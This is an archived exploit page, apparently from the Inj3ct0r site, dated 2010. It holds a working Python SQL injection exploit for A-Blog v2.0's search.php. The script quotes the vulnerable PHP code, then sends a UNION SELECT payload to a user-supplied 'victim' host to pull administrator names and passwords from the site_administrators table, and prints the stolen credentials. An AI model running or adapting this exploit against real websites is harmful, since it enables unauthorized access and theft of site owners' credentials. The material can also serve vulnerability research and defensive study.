
A-Blog v2.0 (sources/search.php) SQL Injection Exploit

Posted on 05 September 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>A-Blog v2.0 (sources/search.php) SQL Injection Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>====================================================== A-Blog v2.0 (sources/search.php) SQL Injection Exploit ====================================================== #!/usr/bin/python # # Exploit Title: A-Blog v2.0 (sources/search.php) SQL Injection Exploit # Date : 05 September 2010 # Author : Ptrace Security (Gianni Gnesa [gnix]) # Contact : research[at]ptrace-security[dot]com # Software Link: http://sourceforge.net/projects/a-blog/ # Version : 2.0 # Tested on : EasyPHP 5.3.1.0 for Windows with Python 3.1 # # # Description # =========== # # + sources/search.php =&gt; This few lines of code strip whitespaces from the # beginning and end of the 'words' GET parameter. Then, # all the whitespaces are replaced with %. # # 12: if ((array_key_exists('words', $_GET)) &amp;&amp; ($_GET['words'] == '')) { # 13: callback_js(&quot;page=results&amp;words=$searchwords&quot;); # 14: } # 15: # 16: else{ # 17: if ((array_key_exists('words', $_GET))) { # 18: $words2 = trim($_GET['words']); # 19: } # 20: $search = str_replace(&quot; &quot;, &quot;%&quot;, &quot;$words2&quot;); # 21: } # # # + sources/search.php =&gt; The string returned from the previous code is used in # the query below without being sanitized. 
# # 33: $sql = &quot;SELECT * FROM site_news WHERE title LIKE '%$search%' OR home_text # LIKE '%$search%' OR extended_text LIKE '%$search%'&quot;; # 34: $sql_result = mysql_query($sql,$connection) or die (&quot;Couldnt execute query&quot;); # # # + sources/search.php =&gt; Then, the results are echoed # # 39: while($row = mysql_fetch_array($sql_result)){ # 40: # 41: $id = $row['nid']; # 42: $title = $row['title']; # 43: $home = $row['home_text']; # 44: $extended = $row['extended_text']; # 45: # 46: echo &quot;&lt;li&gt;&lt;a href='blog.php?view=news&amp;id=$id' title='Read $title'&gt;$title&lt;/a&gt;&lt;/li&gt;&quot;; # 47: } # import re import sys import textwrap import http.client def usage(program): print('Usage : ' + program + ' &lt;victim hostname&gt; &lt;path&gt; ') print('Example: ' + program + ' localhost /A-BlogV2/') print(' ' + program + ' www.victim.com /complete/path/') return def removeDuplicates(mylist): d = {} for elem in mylist: d[elem] = 1 return list(d.keys()) def exploit(target, path): payload = 'search.php?words=%25%27/%2A%2A/UNION/%2A%2A/SELECT/%2A%2A/1%2C' payload += 'CONCAT%28%27%3C1%3E%27%2Cname%2C%27%3A%27%2Cpassword%2C%27%3C2' payload += '%3E%27%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10/%2A%2A/FROM/%2A%2A/' payload += 'site_administrators/%2A%2A/%23' print('[+] Sending HTTP request ') print(textwrap.fill('GET ' + path + payload) + ' ') con = http.client.HTTPConnection(target) con.request('GET', path + payload) res = con.getresponse() if res.status != 200: print('[!] HTTP GET request failed') exit(1) print('[+] Parsing HTTP response') data = res.read().decode() pattern = re.compile(r&quot;&lt;1&gt;([w:]+?)&lt;2&gt;&quot;, re.M) credentials = removeDuplicates(pattern.findall(data)) if len(credentials) &gt; 0: print('[+] Credentials found ') for element in credentials: print(element) else: print('[!] 
Credentials not found') return print(' +---------------------------------------------------------------------------+') print('| A-Blog v2.0 (sources/search.php) SQL Injection Exploit by Ptrace Security |') print('+---------------------------------------------------------------------------+ ') if len(sys.argv) != 3: usage(sys.argv[0]) else: exploit(sys.argv[1], sys.argv[2]) exit(0) # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-05]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 
